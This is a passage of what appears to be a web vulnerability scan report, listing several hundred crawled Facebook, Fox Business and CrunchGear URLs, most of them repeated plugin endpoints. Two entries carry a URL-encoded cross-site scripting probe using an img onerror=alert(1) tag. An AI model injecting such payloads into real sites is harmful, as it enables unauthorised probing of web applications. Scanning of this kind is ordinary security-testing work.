28.42. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/JjnzyF9Ek6s.js

28.43. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/abFky1K8JdH.css

28.44. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/iitWafmrmXE.css

28.45. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css

28.46. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HZ2miH23DO_.css

28.47. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png

28.48. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/2OeU71A9ZhJ.css

28.49. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png

28.50. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/VoMxRc20crG.js

28.51. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/tbLZ3xbV8NS.css

28.52. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/4Ese_3T2rw0.js

28.53. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/xKbCsbIPd0I.css

28.54. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OU0y6L3A4iM.js

28.55. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css

28.56. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/G56BmZyYUs2.png

28.57. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/YwmDQGiwyfx.js

28.58. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/ijofM1PtQgR.css

28.59. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css

28.60. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/h7_K_gtPWhX.css

28.61. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/zhBrOmLKnYo.css

28.62. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/hhXWj5xHnMP.css

28.63. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/SryDYAYpViZ.js

28.64. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/UQfC_F8UZ7s.css

28.65. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/2XNEznNudOF.css

28.66. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/GzjD8q3xBN2.png

28.67. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css

28.68. http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/zA_b_yEgHGT.css

28.69. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/YAJGksZgfUN.css

28.70. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/2G58JkcEnUi.js

28.71. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/z6jSieucnmR.js

28.72. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/icQpW-keluF.css

28.73. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png

28.74. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/MGuL2bFxrJn.js

28.75. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/NsFFrVYzya-.css

28.76. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/Z6rULnd-GE-.png

28.77. http://static.ak.fbcdn.net/rsrc.php/v1/zA/r/XvM8G8srT8f.png

28.78. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/Unmn04Ngmxd.gif

28.79. http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/RVElCNYrs5z.gif

28.80. http://static.ak.fbcdn.net/rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif

28.81. http://static.ak.fbcdn.net/rsrc.php/v1/zc/r/2nqL3wUquAI.png

28.82. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/1x0T5GU6FqP.gif

28.83. http://static.ak.fbcdn.net/rsrc.php/v1/zo/r/a-SMW6SXfy5.png

28.84. http://static.ak.fbcdn.net/rsrc.php/v1/zq/r/i2a6qsmo12r.png

28.85. http://static.ak.fbcdn.net/rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif

28.86. http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/

28.87. http://video.foxbusiness.com/v/4677647/white-house-announces-it-wont-release-bin-laden-pictures/

28.88. http://video.foxbusiness.com/v/4677755/the-need-to-boost-oil-drilling-in-us/

28.89. http://www.crunchgear.com/wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg

28.90. http://www.crunchgear.com/wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg

28.91. http://www.facebook.com/

28.92. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

28.93. http://www.facebook.com/10000082482078341583

28.94. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

28.95. http://www.facebook.com/1242845259

28.96. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

28.97. http://www.facebook.com/2008/fbml

28.98. http://www.facebook.com/AOLrealestate

28.99. http://www.facebook.com/BPAmerica

28.100. http://www.facebook.com/BPAmerica

28.101. http://www.facebook.com/BPAmerica

28.102. http://www.facebook.com/DailyFinance

28.103. http://www.facebook.com/HockeyKen

28.104. http://www.facebook.com/KickIceForever

28.105. http://www.facebook.com/LadyBonesie

28.106. http://www.facebook.com/Loizza

28.107. http://www.facebook.com/aim

28.108. http://www.facebook.com/ajax/connect/feedback.php

28.109. http://www.facebook.com/ajax/connect/vote.php

28.110. http://www.facebook.com/ajax/connect/vote.php

28.111. http://www.facebook.com/ajax/connect/vote.php

28.112. http://www.facebook.com/ajax/connect/vote.php

28.113. http://www.facebook.com/ajax/intl/language_dialog.php

28.114. http://www.facebook.com/ajax/intl/language_dialog.php

28.115. http://www.facebook.com/ajax/intl/language_dialog.php

28.116. http://www.facebook.com/ajax/reg_birthday_help.php

28.117. http://www.facebook.com/ajax/register/logging.php

28.118. http://www.facebook.com/aol

28.119. http://www.facebook.com/aolradio

28.120. http://www.facebook.com/badges

28.121. http://www.facebook.com/badges

28.122. http://www.facebook.com/badges

28.123. http://www.facebook.com/burkerkink

28.124. http://www.facebook.com/campaign/landing.php

28.125. http://www.facebook.com/campaign/landing.php

28.126. http://www.facebook.com/campaign/landing.php

28.127. http://www.facebook.com/campaign/landing.php

28.128. http://www.facebook.com/captcha/tfbimage.php

28.129. http://www.facebook.com/captcha/tfbimage.php

28.130. http://www.facebook.com/careers/

28.131. http://www.facebook.com/careers/

28.132. http://www.facebook.com/careers/

28.133. http://www.facebook.com/deedee.perez1

28.134. http://www.facebook.com/directory/pages/

28.135. http://www.facebook.com/directory/people/

28.136. http://www.facebook.com/extern/login_status.php

28.137. http://www.facebook.com/extern/login_status.php

28.138. http://www.facebook.com/extern/login_status.php

28.139. http://www.facebook.com/extern/login_status.php

28.140. http://www.facebook.com/extern/login_status.php

28.141. http://www.facebook.com/extern/login_status.php

28.142. http://www.facebook.com/extern/login_status.php

28.143. http://www.facebook.com/extern/login_status.php

28.144. http://www.facebook.com/extern/login_status.php

28.145. http://www.facebook.com/extern/login_status.php

28.146. http://www.facebook.com/extern/login_status.php

28.147. http://www.facebook.com/extern/login_status.php

28.148. http://www.facebook.com/extern/login_status.php

28.149. http://www.facebook.com/extern/login_status.php

28.150. http://www.facebook.com/extern/login_status.php

28.151. http://www.facebook.com/extern/login_status.php

28.152. http://www.facebook.com/extern/login_status.php

28.153. http://www.facebook.com/extern/login_status.php

28.154. http://www.facebook.com/extern/login_status.php

28.155. http://www.facebook.com/extern/login_status.php

28.156. http://www.facebook.com/extern/login_status.php

28.157. http://www.facebook.com/extern/login_status.php

28.158. http://www.facebook.com/extern/login_status.php

28.159. http://www.facebook.com/extern/login_status.php

28.160. http://www.facebook.com/extern/login_status.php

28.161. http://www.facebook.com/extern/login_status.php

28.162. http://www.facebook.com/extern/login_status.php

28.163. http://www.facebook.com/extern/login_status.php

28.164. http://www.facebook.com/extern/login_status.php

28.165. http://www.facebook.com/extern/login_status.php

28.166. http://www.facebook.com/extern/login_status.php

28.167. http://www.facebook.com/extern/login_status.php

28.168. http://www.facebook.com/extern/login_status.php

28.169. http://www.facebook.com/extern/login_status.php

28.170. http://www.facebook.com/extern/login_status.php

28.171. http://www.facebook.com/extern/login_status.php

28.172. http://www.facebook.com/extern/login_status.php

28.173. http://www.facebook.com/extern/login_status.php

28.174. http://www.facebook.com/extern/login_status.php

28.175. http://www.facebook.com/extern/login_status.php

28.176. http://www.facebook.com/extern/login_status.php

28.177. http://www.facebook.com/extern/login_status.php

28.178. http://www.facebook.com/extern/login_status.php

28.179. http://www.facebook.com/extern/login_status.php

28.180. http://www.facebook.com/extern/login_status.php

28.181. http://www.facebook.com/extern/login_status.php

28.182. http://www.facebook.com/extern/login_status.php

28.183. http://www.facebook.com/extern/login_status.php

28.184. http://www.facebook.com/extern/login_status.php

28.185. http://www.facebook.com/extern/login_status.php

28.186. http://www.facebook.com/extern/login_status.php

28.187. http://www.facebook.com/extern/login_status.php

28.188. http://www.facebook.com/extern/login_status.php

28.189. http://www.facebook.com/extern/login_status.php

28.190. http://www.facebook.com/extern/login_status.php

28.191. http://www.facebook.com/extern/login_status.php

28.192. http://www.facebook.com/extern/login_status.php

28.193. http://www.facebook.com/extern/login_status.php

28.194. http://www.facebook.com/extern/login_status.php

28.195. http://www.facebook.com/extern/login_status.php

28.196. http://www.facebook.com/extern/login_status.php

28.197. http://www.facebook.com/extern/login_status.php

28.198. http://www.facebook.com/extern/login_status.php

28.199. http://www.facebook.com/extern/login_status.php

28.200. http://www.facebook.com/extern/login_status.php

28.201. http://www.facebook.com/extern/login_status.php

28.202. http://www.facebook.com/extern/login_status.php

28.203. http://www.facebook.com/extern/login_status.php

28.204. http://www.facebook.com/extern/login_status.php

28.205. http://www.facebook.com/extern/login_status.php

28.206. http://www.facebook.com/extern/login_status.php

28.207. http://www.facebook.com/extern/login_status.php

28.208. http://www.facebook.com/extern/login_status.php

28.209. http://www.facebook.com/extern/login_status.php

28.210. http://www.facebook.com/extern/login_status.php

28.211. http://www.facebook.com/extern/login_status.php

28.212. http://www.facebook.com/extern/login_status.php

28.213. http://www.facebook.com/extern/login_status.php

28.214. http://www.facebook.com/extern/login_status.php

28.215. http://www.facebook.com/extern/login_status.php

28.216. http://www.facebook.com/extern/login_status.php

28.217. http://www.facebook.com/extern/login_status.php

28.218. http://www.facebook.com/extern/login_status.php

28.219. http://www.facebook.com/extern/login_status.php

28.220. http://www.facebook.com/extern/login_status.php

28.221. http://www.facebook.com/extern/login_status.php

28.222. http://www.facebook.com/extern/login_status.php

28.223. http://www.facebook.com/extern/login_status.php

28.224. http://www.facebook.com/extern/login_status.php

28.225. http://www.facebook.com/extern/login_status.php

28.226. http://www.facebook.com/extern/login_status.php

28.227. http://www.facebook.com/extern/login_status.php

28.228. http://www.facebook.com/extern/login_status.php

28.229. http://www.facebook.com/extern/login_status.php

28.230. http://www.facebook.com/extern/login_status.php

28.231. http://www.facebook.com/extern/login_status.php

28.232. http://www.facebook.com/extern/login_status.php

28.233. http://www.facebook.com/extern/login_status.php

28.234. http://www.facebook.com/extern/login_status.php

28.235. http://www.facebook.com/extern/login_status.php

28.236. http://www.facebook.com/extern/login_status.php

28.237. http://www.facebook.com/extern/login_status.php

28.238. http://www.facebook.com/extern/login_status.php

28.239. http://www.facebook.com/extern/login_status.php

28.240. http://www.facebook.com/extern/login_status.php

28.241. http://www.facebook.com/extern/login_status.php

28.242. http://www.facebook.com/extern/login_status.php

28.243. http://www.facebook.com/extern/login_status.php

28.244. http://www.facebook.com/extern/login_status.php

28.245. http://www.facebook.com/extern/login_status.php

28.246. http://www.facebook.com/extern/login_status.php

28.247. http://www.facebook.com/extern/login_status.php

28.248. http://www.facebook.com/extern/login_status.php

28.249. http://www.facebook.com/extern/login_status.php

28.250. http://www.facebook.com/extern/login_status.php

28.251. http://www.facebook.com/extern/login_status.php

28.252. http://www.facebook.com/extern/login_status.php

28.253. http://www.facebook.com/extern/login_status.php

28.254. http://www.facebook.com/extern/login_status.php

28.255. http://www.facebook.com/extern/login_status.php

28.256. http://www.facebook.com/extern/login_status.php

28.257. http://www.facebook.com/extern/login_status.php

28.258. http://www.facebook.com/extern/login_status.php

28.259. http://www.facebook.com/extern/login_status.php

28.260. http://www.facebook.com/extern/login_status.php

28.261. http://www.facebook.com/extern/login_status.php

28.262. http://www.facebook.com/extern/login_status.php

28.263. http://www.facebook.com/extern/login_status.php

28.264. http://www.facebook.com/extern/login_status.php

28.265. http://www.facebook.com/extern/login_status.php

28.266. http://www.facebook.com/extern/login_status.php

28.267. http://www.facebook.com/extern/login_status.php

28.268. http://www.facebook.com/extern/login_status.php

28.269. http://www.facebook.com/extern/login_status.php

28.270. http://www.facebook.com/extern/login_status.php

28.271. http://www.facebook.com/extern/login_status.php

28.272. http://www.facebook.com/extern/login_status.php

28.273. http://www.facebook.com/extern/login_status.php

28.274. http://www.facebook.com/extern/login_status.php

28.275. http://www.facebook.com/facebook

28.276. http://www.facebook.com/favicon.ico

28.277. http://www.facebook.com/fayse

28.278. http://www.facebook.com/find-friends

28.279. http://www.facebook.com/find-friends

28.280. http://www.facebook.com/find-friends

28.281. http://www.facebook.com/find-friends

28.282. http://www.facebook.com/gale.l.schenk

28.283. http://www.facebook.com/help/

28.284. http://www.facebook.com/help/

28.285. http://www.facebook.com/help/

28.286. http://www.facebook.com/help/

28.287. http://www.facebook.com/help/

28.288. http://www.facebook.com/home.php

28.289. http://www.facebook.com/images/policy/TRUSTe_EU.png

28.290. http://www.facebook.com/images/policy/TRUSTe_verify.png

28.291. http://www.facebook.com/izaOllie

28.292. http://www.facebook.com/jezzas

28.293. http://www.facebook.com/kimberly.christ

28.294. http://www.facebook.com/ladonna.lokey

28.295. http://www.facebook.com/lakendra.roberts

28.296. http://www.facebook.com/login.php

28.297. http://www.facebook.com/login.php

28.298. http://www.facebook.com/mapquest

28.299. http://www.facebook.com/matthew.oliveira2

28.300. http://www.facebook.com/mmafighting

28.301. http://www.facebook.com/mobile

28.302. http://www.facebook.com/mobile

28.303. http://www.facebook.com/mobile

28.304. http://www.facebook.com/mobile

28.305. http://www.facebook.com/mobile/

28.306. http://www.facebook.com/mobile/

28.307. http://www.facebook.com/mobile/

28.308. http://www.facebook.com/mobile/

28.309. http://www.facebook.com/pages/Barnesville/115038011847083

28.310. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

28.311. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

28.312. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

28.313. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

28.314. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

28.315. http://www.facebook.com/pages/HMFIC/149403761740008

28.316. http://www.facebook.com/pages/HuffPost-World/70242384902

28.317. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

28.318. http://www.facebook.com/pages/Merchandiser/123981654314779

28.319. http://www.facebook.com/pages/New-Haven-College/130105783687523

28.320. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

28.321. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

28.322. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

28.323. http://www.facebook.com/pages/Sporting-News/104068362964496

28.324. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

28.325. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

28.326. http://www.facebook.com/pages/create.php

28.327. http://www.facebook.com/pages/create.php

28.328. http://www.facebook.com/pages/create.php

28.329. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

28.330. http://www.facebook.com/patroyo

28.331. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

28.332. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

28.333. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

28.334. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

28.335. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

28.336. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

28.337. http://www.facebook.com/people/Bucky-Jordan/100000824820783

28.338. http://www.facebook.com/people/Bucky-Jordan/100000824820783

28.339. http://www.facebook.com/people/Bucky-Jordan/100000824820783

28.340. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22

28.341. http://www.facebook.com/plugins/activity.php

28.342. http://www.facebook.com/plugins/activity.php

28.343. http://www.facebook.com/plugins/activity.php

28.344. http://www.facebook.com/plugins/activity.php

28.345. http://www.facebook.com/plugins/activity.php

28.346. http://www.facebook.com/plugins/activity.php

28.347. http://www.facebook.com/plugins/activity.php

28.348. http://www.facebook.com/plugins/activity.php

28.349. http://www.facebook.com/plugins/activity.php

28.350. http://www.facebook.com/plugins/activity.php

28.351. http://www.facebook.com/plugins/activity.php

28.352. http://www.facebook.com/plugins/activity.php

28.353. http://www.facebook.com/plugins/activity.php

28.354. http://www.facebook.com/plugins/activity.php

28.355. http://www.facebook.com/plugins/activity.php

28.356. http://www.facebook.com/plugins/activity.php

28.357. http://www.facebook.com/plugins/activity.php

28.358. http://www.facebook.com/plugins/activity.php

28.359. http://www.facebook.com/plugins/activity.php

28.360. http://www.facebook.com/plugins/activity.php

28.361. http://www.facebook.com/plugins/activity.php

28.362. http://www.facebook.com/plugins/activity.php

28.363. http://www.facebook.com/plugins/activity.php

28.364. http://www.facebook.com/plugins/activity.php

28.365. http://www.facebook.com/plugins/activity.php

28.366. http://www.facebook.com/plugins/activity.php

28.367. http://www.facebook.com/plugins/activity.php

28.368. http://www.facebook.com/plugins/activity.php

28.369. http://www.facebook.com/plugins/activity.php

28.370. http://www.facebook.com/plugins/activity.php

28.371. http://www.facebook.com/plugins/activity.php

28.372. http://www.facebook.com/plugins/activity.php

28.373. http://www.facebook.com/plugins/activity.php

28.374. http://www.facebook.com/plugins/activity.php

28.375. http://www.facebook.com/plugins/activity.php

28.376. http://www.facebook.com/plugins/activity.php

28.377. http://www.facebook.com/plugins/activity.php

28.378. http://www.facebook.com/plugins/activity.php

28.379. http://www.facebook.com/plugins/activity.php

28.380. http://www.facebook.com/plugins/activity.php

28.381. http://www.facebook.com/plugins/activity.php

28.382. http://www.facebook.com/plugins/activity.php

28.383. http://www.facebook.com/plugins/activity.php

28.384. http://www.facebook.com/plugins/activity.php

28.385. http://www.facebook.com/plugins/activity.php

28.386. http://www.facebook.com/plugins/activity.php

28.387. http://www.facebook.com/plugins/activity.php

28.388. http://www.facebook.com/plugins/activity.php

28.389. http://www.facebook.com/plugins/activity.php

28.390. http://www.facebook.com/plugins/activity.php

28.391. http://www.facebook.com/plugins/activity.php

28.392. http://www.facebook.com/plugins/activity.php

28.393. http://www.facebook.com/plugins/activity.php

28.394. http://www.facebook.com/plugins/activity.php

28.395. http://www.facebook.com/plugins/activity.php

28.396. http://www.facebook.com/plugins/activity.php

28.397. http://www.facebook.com/plugins/activity.php

28.398. http://www.facebook.com/plugins/activity.php

28.399. http://www.facebook.com/plugins/activity.php

28.400. http://www.facebook.com/plugins/activity.php

28.401. http://www.facebook.com/plugins/activity.php

28.402. http://www.facebook.com/plugins/activity.php

28.403. http://www.facebook.com/plugins/activity.php

28.404. http://www.facebook.com/plugins/comments.php

28.405. http://www.facebook.com/plugins/comments.php

28.406. http://www.facebook.com/plugins/comments.php

28.407. http://www.facebook.com/plugins/comments.php

28.408. http://www.facebook.com/plugins/comments.php

28.409. http://www.facebook.com/plugins/facepile.php

28.410. http://www.facebook.com/plugins/facepile.php

28.411. http://www.facebook.com/plugins/facepile.php

28.412. http://www.facebook.com/plugins/facepile.php

28.413. http://www.facebook.com/plugins/facepile.php

28.414. http://www.facebook.com/plugins/facepile.php

28.415. http://www.facebook.com/plugins/facepile.php

28.416. http://www.facebook.com/plugins/facepile.php

28.417. http://www.facebook.com/plugins/facepile.php

28.418. http://www.facebook.com/plugins/like.php

28.419. http://www.facebook.com/plugins/like.php

28.420. http://www.facebook.com/plugins/like.php

28.421. http://www.facebook.com/plugins/like.php

28.422. http://www.facebook.com/plugins/like.php

28.423. http://www.facebook.com/plugins/like.php

28.424. http://www.facebook.com/plugins/like.php

28.425. http://www.facebook.com/plugins/like.php

28.426. http://www.facebook.com/plugins/like.php

28.427. http://www.facebook.com/plugins/like.php

28.428. http://www.facebook.com/plugins/like.php

28.429. http://www.facebook.com/plugins/like.php

28.430. http://www.facebook.com/plugins/like.php

28.431. http://www.facebook.com/plugins/like.php

28.432. http://www.facebook.com/plugins/like.php

28.433. http://www.facebook.com/plugins/like.php

28.434. http://www.facebook.com/plugins/like.php

28.435. http://www.facebook.com/plugins/like.php

28.436. http://www.facebook.com/plugins/like.php

28.437. http://www.facebook.com/plugins/like.php

28.438. http://www.facebook.com/plugins/like.php

28.439. http://www.facebook.com/plugins/like.php

28.440. http://www.facebook.com/plugins/like.php

28.441. http://www.facebook.com/plugins/like.php

28.442. http://www.facebook.com/plugins/like.php

28.443. http://www.facebook.com/plugins/like.php

28.444. http://www.facebook.com/plugins/like.php

28.445. http://www.facebook.com/plugins/like.php

28.446. http://www.facebook.com/plugins/like.php

28.447. http://www.facebook.com/plugins/like.php

28.448. http://www.facebook.com/plugins/like.php

28.449. http://www.facebook.com/plugins/like.php

28.450. http://www.facebook.com/plugins/like.php

28.451. http://www.facebook.com/plugins/like.php

28.452. http://www.facebook.com/plugins/like.php

28.453. http://www.facebook.com/plugins/like.php

28.454. http://www.facebook.com/plugins/like.php

28.455. http://www.facebook.com/plugins/like.php

28.456. http://www.facebook.com/plugins/like.php

28.457. http://www.facebook.com/plugins/like.php

28.458. http://www.facebook.com/plugins/like.php

28.459. http://www.facebook.com/plugins/like.php

28.460. http://www.facebook.com/plugins/like.php

28.461. http://www.facebook.com/plugins/like.php

28.462. http://www.facebook.com/plugins/like.php

28.463. http://www.facebook.com/plugins/like.php

28.464. http://www.facebook.com/plugins/like.php

28.465. http://www.facebook.com/plugins/like.php

28.466. http://www.facebook.com/plugins/like.php

28.467. http://www.facebook.com/plugins/like.php

28.468. http://www.facebook.com/plugins/like.php

28.469. http://www.facebook.com/plugins/like.php

28.470. http://www.facebook.com/plugins/like.php

28.471. http://www.facebook.com/plugins/like.php

28.472. http://www.facebook.com/plugins/like.php

28.473. http://www.facebook.com/plugins/like.php

28.474. http://www.facebook.com/plugins/like.php

28.475. http://www.facebook.com/plugins/like.php

28.476. http://www.facebook.com/plugins/like.php

28.477. http://www.facebook.com/plugins/like.php

28.478. http://www.facebook.com/plugins/like.php

28.479. http://www.facebook.com/plugins/like.php

28.480. http://www.facebook.com/plugins/like.php

28.481. http://www.facebook.com/plugins/like.php

28.482. http://www.facebook.com/plugins/like.php

28.483. http://www.facebook.com/plugins/like.php

28.484. http://www.facebook.com/plugins/like.php

28.485. http://www.facebook.com/plugins/like.php

28.486. http://www.facebook.com/plugins/like.php

28.487. http://www.facebook.com/plugins/like.php

28.488. http://www.facebook.com/plugins/like.php

28.489. http://www.facebook.com/plugins/like.php

28.490. http://www.facebook.com/plugins/like.php

28.491. http://www.facebook.com/plugins/like.php

28.492. http://www.facebook.com/plugins/like.php

28.493. http://www.facebook.com/plugins/like.php

28.494. http://www.facebook.com/plugins/like.php

28.495. http://www.facebook.com/plugins/like.php

28.496. http://www.facebook.com/plugins/like.php

28.497. http://www.facebook.com/plugins/like.php

28.498. http://www.facebook.com/plugins/like.php

28.499. http://www.facebook.com/plugins/like.php

28.500. http://www.facebook.com/plugins/like.php

28.501. http://www.facebook.com/plugins/like.php

28.502. http://www.facebook.com/plugins/like.php

28.503. http://www.facebook.com/plugins/like.php

28.504. http://www.facebook.com/plugins/like.php

28.505. http://www.facebook.com/plugins/like.php

28.506. http://www.facebook.com/plugins/like.php

28.507. http://www.facebook.com/plugins/like.php

28.508. http://www.facebook.com/plugins/like.php

28.509. http://www.facebook.com/plugins/like.php

28.510. http://www.facebook.com/plugins/like.php

28.511. http://www.facebook.com/plugins/like.php

28.512. http://www.facebook.com/plugins/like.php

28.513. http://www.facebook.com/plugins/likebox.php

28.514. http://www.facebook.com/plugins/likebox.php

28.515. http://www.facebook.com/plugins/likebox.php

28.516. http://www.facebook.com/plugins/likebox.php

28.517. http://www.facebook.com/plugins/likebox.php

28.518. http://www.facebook.com/plugins/likebox.php

28.519. http://www.facebook.com/plugins/likebox.php

28.520. http://www.facebook.com/plugins/likebox.php

28.521. http://www.facebook.com/plugins/likebox.php

28.522. http://www.facebook.com/plugins/likebox.php

28.523. http://www.facebook.com/plugins/likebox.php

28.524. http://www.facebook.com/plugins/likebox.php

28.525. http://www.facebook.com/plugins/likebox.php

28.526. http://www.facebook.com/plugins/likebox.php

28.527. http://www.facebook.com/plugins/likebox.php

28.528. http://www.facebook.com/plugins/likebox.php

28.529. http://www.facebook.com/plugins/likebox.php

28.530. http://www.facebook.com/plugins/likebox.php

28.531. http://www.facebook.com/plugins/likebox.php

28.532. http://www.facebook.com/plugins/likebox.php

28.533. http://www.facebook.com/plugins/likebox.php

28.534. http://www.facebook.com/plugins/likebox.php

28.535. http://www.facebook.com/plugins/likebox.php

28.536. http://www.facebook.com/plugins/likebox.php

28.537. http://www.facebook.com/plugins/likebox.php

28.538. http://www.facebook.com/plugins/likebox.php

28.539. http://www.facebook.com/plugins/likebox.php

28.540. http://www.facebook.com/plugins/likebox.php

28.541. http://www.facebook.com/plugins/likebox.php

28.542. http://www.facebook.com/plugins/likebox.php

28.543. http://www.facebook.com/plugins/likebox.php

28.544. http://www.facebook.com/plugins/likebox.php

28.545. http://www.facebook.com/plugins/likebox.php

28.546. http://www.facebook.com/plugins/likebox.php

28.547. http://www.facebook.com/plugins/likebox.php

28.548. http://www.facebook.com/plugins/likebox.php

28.549. http://www.facebook.com/plugins/likebox.php

28.550. http://www.facebook.com/plugins/likebox.php

28.551. http://www.facebook.com/plugins/likebox.php

28.552. http://www.facebook.com/plugins/likebox.php

28.553. http://www.facebook.com/plugins/likebox.php

28.554. http://www.facebook.com/plugins/likebox.php

28.555. http://www.facebook.com/plugins/likebox.php

28.556. http://www.facebook.com/plugins/likebox.php

28.557. http://www.facebook.com/plugins/likebox.php

28.558. http://www.facebook.com/plugins/likebox.php

28.559. http://www.facebook.com/plugins/likebox.php

28.560. http://www.facebook.com/plugins/likebox.php

28.561. http://www.facebook.com/plugins/likebox.php

28.562. http://www.facebook.com/plugins/likebox.php

28.563. http://www.facebook.com/plugins/likebox.php

28.564. http://www.facebook.com/plugins/likebox.php

28.565. http://www.facebook.com/plugins/likebox.php

28.566. http://www.facebook.com/plugins/likebox.php

28.567. http://www.facebook.com/plugins/likebox.php

28.568. http://www.facebook.com/plugins/likebox.php

28.569. http://www.facebook.com/plugins/likebox.php

28.570. http://www.facebook.com/plugins/likebox.php

28.571. http://www.facebook.com/plugins/likebox.php

28.572. http://www.facebook.com/plugins/likebox.php

28.573. http://www.facebook.com/plugins/likebox.php

28.574. http://www.facebook.com/plugins/likebox.php

28.575. http://www.facebook.com/plugins/likebox.php

28.576. http://www.facebook.com/plugins/likebox.php

28.577. http://www.facebook.com/plugins/likebox.php

28.578. http://www.facebook.com/plugins/likebox.php

28.579. http://www.facebook.com/plugins/likebox.php

28.580. http://www.facebook.com/plugins/likebox.php

28.581. http://www.facebook.com/plugins/likebox.php

28.582. http://www.facebook.com/plugins/likebox.php

28.583. http://www.facebook.com/plugins/likebox.php

28.584. http://www.facebook.com/plugins/likebox.php

28.585. http://www.facebook.com/plugins/likebox.php

28.586. http://www.facebook.com/plugins/likebox.php

28.587. http://www.facebook.com/plugins/likebox.php

28.588. http://www.facebook.com/plugins/likebox.php

28.589. http://www.facebook.com/plugins/likebox.php

28.590. http://www.facebook.com/plugins/likebox.php

28.591. http://www.facebook.com/plugins/likebox.php

28.592. http://www.facebook.com/plugins/likebox.php

28.593. http://www.facebook.com/plugins/likebox.php

28.594. http://www.facebook.com/plugins/likebox.php

28.595. http://www.facebook.com/plugins/recommendations.php

28.596. http://www.facebook.com/plugins/recommendations.php

28.597. http://www.facebook.com/plugins/recommendations.php

28.598. http://www.facebook.com/plugins/recommendations.php

28.599. http://www.facebook.com/plugins/recommendations.php

28.600. http://www.facebook.com/plugins/recommendations.php

28.601. http://www.facebook.com/plugins/recommendations.php

28.602. http://www.facebook.com/plugins/recommendations.php

28.603. http://www.facebook.com/plugins/send.php

28.604. http://www.facebook.com/plugins/send.php

28.605. http://www.facebook.com/plugins/send.php

28.606. http://www.facebook.com/plugins/send.php

28.607. http://www.facebook.com/plugins/send.php

28.608. http://www.facebook.com/plugins/send.php

28.609. http://www.facebook.com/plugins/send.php

28.610. http://www.facebook.com/plugins/send.php

28.611. http://www.facebook.com/plugins/send.php

28.612. http://www.facebook.com/plugins/send.php

28.613. http://www.facebook.com/plugins/send.php

28.614. http://www.facebook.com/plugins/send.php

28.615. http://www.facebook.com/plugins/send.php

28.616. http://www.facebook.com/plugins/send.php

28.617. http://www.facebook.com/plugins/send.php

28.618. http://www.facebook.com/plugins/send.php

28.619. http://www.facebook.com/plugins/send.php

28.620. http://www.facebook.com/plugins/send.php

28.621. http://www.facebook.com/plugins/send.php

28.622. http://www.facebook.com/plugins/send.php

28.623. http://www.facebook.com/plugins/send.php

28.624. http://www.facebook.com/plugins/send.php

28.625. http://www.facebook.com/plugins/send.php

28.626. http://www.facebook.com/plugins/send.php

28.627. http://www.facebook.com/plugins/send.php

28.628. http://www.facebook.com/plugins/send.php

28.629. http://www.facebook.com/plugins/send.php

28.630. http://www.facebook.com/plugins/send.php

28.631. http://www.facebook.com/plugins/send.php

